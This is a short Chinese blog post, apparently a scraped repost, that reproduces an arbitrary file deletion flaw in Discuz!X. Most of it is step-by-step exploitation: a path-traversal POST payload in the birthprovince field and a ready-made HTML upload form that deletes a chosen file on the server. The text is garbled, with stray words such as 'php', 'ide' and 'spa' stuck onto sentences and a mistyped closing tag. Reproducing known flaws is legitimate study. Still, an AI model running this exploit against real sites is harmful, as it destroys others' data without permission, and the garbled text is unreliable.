Discuz!X前臺任意文件刪除漏洞重現
漏洞影響了Discuz 3.4 如下的全部版本。
該漏洞存在於upload/source/include/spacecp/spacecp_profile.php,文件中的submitcheck()函數。成功上傳文件會跳轉執行unlink這個函數。php
1.進入設置-我的資料,先在頁面源代碼找到formhash值,能夠看到值爲2599b5e5html
2.開啓一個插件Hackbar
Post數據:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5ide
執行後會顯示一片空白,你再刷新下或從新訪問下就行了。函數
3.出生地被修改爲要刪除的文件。
最後構造表單執行刪除文件spa
<form action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data"> <input type="file" name="birthprovince" id="file" /> <input type="text" name="formhash" value="720c16c3"/></p> <input type="text" name="profilesubmit" value="1"/></p> <input type="submit" value="Submit" /> </from>
生成.html,上面的須要本身修改。
4.而後隨便上傳一張圖片,就能刪除本身要刪除的。插件
5.再訪問回去看一下。code
相關文章
- 1. Discuz!X前臺任意文件刪除漏洞重現
- 2. wordpresss任意文件刪除漏洞復現
- 3. Wordpress4.9.6 任意文件刪除漏洞復現分析
- 4. PHP代碼審計——任意文件刪除漏洞(YXcms1.4.6)
- 5. 【代碼審計】TuziCMS_v3.0_任意文件刪除漏洞分析
- 6. 任意下載漏洞、任意文件上傳漏洞和任意文件包含漏洞的學習記錄
- 7. 【代碼審計】CLTPHP_v5.5.3後臺任意文件刪除漏洞分析
- 8. 【代碼審計】CLTPHP_v5.5.3 前臺任意文件上傳漏洞
- 9. ThinkCMF任意文件寫入漏洞——漏洞復現
- 10. 【漏洞復現】---- ActiveMQ任意文件寫入漏洞(CVE-2016-3088)
- 更多相關文章...
- • SQLite 刪除表 - SQLite教程
- • ADO 刪除記錄 - ADO 教程
- • Docker容器實戰(七) - 容器眼光下的文件系統
- • SpringBoot中properties文件不能自動提示解決方法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 字節跳動21屆秋招運營兩輪面試經驗分享
- 2. Java 3 年,25K 多嗎?
- 3. mysql安裝部署
- 4. web前端開發中父鏈和子鏈方式實現通信
- 5. 3.1.6 spark體系之分佈式計算-scala編程-scala中trait特性
- 6. dataframe2
- 7. ThinkFree在線
- 8. 在線畫圖
- 9. devtools熱部署
- 10. 編譯和鏈接
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Discuz!X前臺任意文件刪除漏洞重現
- 2. wordpresss任意文件刪除漏洞復現
- 3. Wordpress4.9.6 任意文件刪除漏洞復現分析
- 4. PHP代碼審計——任意文件刪除漏洞(YXcms1.4.6)
- 5. 【代碼審計】TuziCMS_v3.0_任意文件刪除漏洞分析
- 6. 任意下載漏洞、任意文件上傳漏洞和任意文件包含漏洞的學習記錄
- 7. 【代碼審計】CLTPHP_v5.5.3後臺任意文件刪除漏洞分析
- 8. 【代碼審計】CLTPHP_v5.5.3 前臺任意文件上傳漏洞
- 9. ThinkCMF任意文件寫入漏洞——漏洞復現
- 10. 【漏洞復現】---- ActiveMQ任意文件寫入漏洞(CVE-2016-3088)